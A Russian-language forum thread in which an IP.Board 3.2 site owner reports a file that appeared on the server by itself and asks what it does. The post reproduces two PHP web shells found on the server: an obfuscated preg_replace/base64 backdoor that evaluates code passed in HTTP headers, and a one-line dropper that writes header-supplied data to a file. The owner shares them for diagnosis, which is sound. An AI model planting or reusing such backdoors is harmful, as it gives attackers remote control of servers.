Jump to content

Непонятный PHP-файл, который появился сам в IPB 3.2


Recommended Posts

Здравствуйте!

 

Обнаружил PHP-файл, который не загружал на сервер, а также которого нет в исходном дистре IPB 3.2. Файл называется 5c258130.php.

 

Файл нашел в 2 местах, содержимое отличается:

 

В корне:

<?php $_a3dc="x70x72x65x67x5fx72x65x70x6cx61x63x65";$_a3dc("x7cx2ex7cx65","x65x76x61x6cx28x27x65x76x61x6cx28x62x61x73x65x36x34x5fx64x65x63x6fx64x65x28x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7x22x29x29x3bx27x29",'.');?>

В папке cache:


==============================================================================
 URL: /index.php/index.php
 Date: Tue, 20 Nov 2012 10:16:53 +0000
 IP Address: 31.3.250.226
 Time Taken: 0.04346
 <?php file_put_contents(@$_SERVER[HTTP_FILENAME],base64_decode(@$_SERVER[HTTP_DATA]));echo md5(12345);?>

==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php? ===================================
==============================================================================

IP-адрес Великобритании. Я там никогда не хостился и сам из тех сетей не ходил.

 

Сам не программер, оценить код PHP не могу. Тем более, что первый выглядит как упакованный или как какой-то брутфорсер.

 

Внимание, вопросы:

 

1. Что это такое?

2. Как могло попасть (данные для входа никто не имел, пароли все мегастойкие)?

3. Что оно делало?


Точная версия борды:

 

IP.Board Version 3.2.0 (ID:32003) Edited by EIKA
Link to comment
Share on other sites

бессмысленные посты не нужно писать. 

Почему бессмысленные? IPB 3.2 забита уязвимостями 

Link to comment
Share on other sites

Почему бессмысленные? IPB 3.2 забита уязвимостями 

ТС спрашивает о файле, а не о том, как защитится. 

Link to comment
Share on other sites

Обновляться буду, но позже, ибо тут немного дизайн подпилен, уже не помню где и что я там пилил...

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Ваша ссылка была автоматически строена.   Отображать как обычную ссылку

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...